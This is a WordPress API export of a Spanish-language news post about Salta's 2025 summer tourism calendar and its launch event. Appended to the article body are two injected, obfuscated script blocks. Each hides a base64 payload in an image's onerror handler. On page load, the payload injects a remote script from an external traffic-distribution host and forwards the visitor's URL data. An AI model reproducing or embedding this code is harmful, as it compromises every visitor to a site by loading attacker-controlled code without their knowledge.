{"id":4689,"date":"2024-12-16T10:34:32","date_gmt":"2024-12-16T13:34:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4689"},"modified":"2025-08-13T23:43:34","modified_gmt":"2025-08-14T02:43:34","slug":"con-mas-de-2600-actividades-se-presento-el-calendario-turistico-de-verano-2025","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4689","title":{"rendered":"Con m\u00e1s de 2600 actividades se present\u00f3 el Calendario Tur\u00edstico de Verano 2025"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\"><em>La oferta de experiencias de los municipios de las siete regiones de Salta puede consultarse en https:\/\/calendario.turismosalta.gov.ar\/<\/em><\/h4>\n\n\n\n<p>Los municipios de las siete regiones tur\u00edsticas de Salta convocan a m\u00e1s de 2600 actividades en el Calendario Tur\u00edstico de Verano 2025 presentado esta ma\u00f1ana en la Usina Cultural por el Ministerio de Turismo y Deportes, ante funcionarios municipales y referentes del sector privado quienes disfrutaron de las coplas del ni\u00f1o Victorio Barboza y la actuaci\u00f3n de Chiretes. El calendario puede consultarse en:&nbsp;<a href=\"https:\/\/calendario.turismosalta.gov.ar\/\">https:\/\/calendario.turismosalta.gov.ar\/<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15309-con-mas-de-2600-actividades-se-presento-el-calendario-turistico-de-verano-2025.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15309-con-mas-de-2600-actividades-se-presento-el-calendario-turistico-de-verano-2025.webp\" alt=\"Con m\u00e1s de 2600 actividades se present\u00f3 el Calendario Tur\u00edstico de Verano 2025.\"\/><\/a><\/figure>\n\n\n\n<p>En la oportunidad, el subsecretario de Desarrollo y Competitividad&nbsp;<strong>Juan Lucero<\/strong>&nbsp;destac\u00f3 a la provincia como uno de los destinos m\u00e1s elegidos con un alto \u00edndice de repitencia por parte del visitante; asimismo, agreg\u00f3 que el Calendario de Verano 2025 ofrece m\u00e1s de 2600 experiencias en 23 municipios para que el visitante venga a disfrutar Salta; podr\u00e1 participar de ferias gastron\u00f3micas, festivales con sus caracter\u00edsticas regionales.<\/p>\n\n\n\n<p>En tanto, el presidente de la C\u00e1mara de Turismo&nbsp;<strong>Facundo Assaf&nbsp;<\/strong>enfatiz\u00f3 el trabajo articulado del sector p\u00fablico con el privado que conforman un verdadero compromiso federal e invit\u00f3 a descubrir Salta y todo lo que tiene para ofrecer.<\/p>\n\n\n\n<p>Por su parte, el intendente de Campo Quijano&nbsp;<strong>Lino Yonar<\/strong>&nbsp;se refiri\u00f3 a las amplias experiencias que se pueden tener en la Quebrada del Toro, como el Carnaval de altura en el que se revive la tradici\u00f3n de la Quebrada, en lo cultural y en lo tradicional. Asimismo, se\u00f1al\u00f3 como atracciones a la feria de artesanos, la belleza natural y el dique Las Lomitas, entre otros.<\/p>\n\n\n\n<p>Estuvieron presentes: la subsecretaria de Promoci\u00f3n y Marketing del Ministerio de Turismo y Deportes Laura Alcorta, el presidente de la C\u00e1mara Hotelera Gastron\u00f3mica Juan Chib\u00e1n, autoridades de los municipios de la Ciudad de Salta, General G\u00fcemes, Vaqueros, San Jos\u00e9 de los Cerrillos, Campo Quijano, San Antonio de los Cobres, Molinos, Cachi, San Lorenzo, Guachipas, San Jos\u00e9 de Met\u00e1n y El Carril. Referentes de las asociaciones y c\u00e1maras tur\u00edsticas del sector privado.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15310-con-mas-de-2600-actividades-se-presento-el-calendario-turistico-de-verano-2025.webp\" alt=\"\"\/><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La oferta de experiencias de los municipios de las siete regiones de Salta puede consultarse en https:\/\/calendario.turismosalta.gov.ar\/ Los municipios de las siete regiones tur\u00edsticas de Salta convocan a m\u00e1s de 2600 actividades en el Calendario Tur\u00edstico de Verano 2025 presentado esta ma\u00f1ana en la Usina Cultural por el Ministerio de Turismo y Deportes, ante funcionarios [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4690,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-4689","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4689"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4689"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4689\/revisions"}],"predecessor-version":[{"id":6611,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4689\/revisions\/6611"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4690"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4689"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4689"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4689"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}